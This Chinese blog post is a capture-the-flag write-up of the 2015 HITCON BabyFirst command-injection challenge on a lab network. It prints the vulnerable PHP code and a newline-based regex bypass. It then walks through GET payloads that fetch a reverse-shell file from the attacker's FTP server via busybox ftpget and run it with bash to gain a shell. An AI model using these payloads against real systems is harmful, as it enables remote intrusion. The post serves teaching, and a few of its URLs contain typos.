命令执行漏洞---题目练习(2015 HITCON BabyFirst)

一、2015 HITCON BabyFirst

环境:

攻击机:kali--192.168.198.128、win10浏览器

目标机器:ubuntu--92.168.198.135

题目源代码:

<?php
$dir = 'sandbox/' .$_SERVER['REMOTE_ADDR'];
if (!file_exists($dir))
        mkdir($dir);
chdir($dir);

$args = $_GET['args'];
for ($i=0; $i<count($args);$i++){
        if (!preg_match('/^\w+$/', $args[$i]))
                exit;
}
exec("/bin/orange " .implode(" ",$args));
?>

为用户创建一个沙箱目录,对用户输入数据作正则限制”^\w+$“,让后用用户输入数据执行exec(),这是注命令执行点。关键是要对正则限制的绕过,限制为:输入只能有数字、字母下划线组成,这导致我们无法直接利用&&、$()等来进行执行我们的命令。因为题目里得到正则表达式没有开启多行匹配,可用用换行符来绕过,即正则表达式最后的 $ 符看到 \n 就认为匹配完了。而且,利用换行符我们可用执行后面我们的命令。如下建 执行 touch test 命令。

http://ip/index.php?args[0]=a%0a&args[1]=touch&args[2]test

执行后网站后台成功创建test文件

单我们直接向文件写入数据比较困难 > 符号用不了,我们写不了数据但我们可用让它下载数据,利用 wget、ftp 等从我们自己搭建平台下载数据,下列以 FTP为例

wget可用参考下面的文章:

https://blog.spoock.com/2017/09/09/Babyfirst-writeup/

首先搭建自己的FTP服务平台,利用python 的pyftpdlib模块快速搭建一个匿名FTP服务(对于在真实环境中,我们要让目标机器访问到我们得到FTP服务,我们的主机必须要有公网IP或者和目标主机在同一网络下)。下载pyftpdlib模块

pip下载:pip install pyftpdlib

创建含反弹shell 的文件

执行搭建:python -m pyftpdlib -p 21

将搭建的TFP服务平台的IP地址转换为十进制(因为正则限制下不能有点符号)

构造

busybox ftpget 3232286336 1   
?args[0]=a%0a&args[1]=busybox&args[2]=ftpget&args[3]=3232286336&args[4]=1

浏览器执行: 

网站后台已经成功次下载了 含反弹shell的文件 

 现在只需要执行目标机器上的反弹shell ,我们就能以www-data的身份进入系统内

在反弹的IP机器上监听:

 浏览器输入

?args[0]=a%0a&args[1]=bash&args[2]=1

可用看到我们的攻击机已经成功连接目标机器: 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值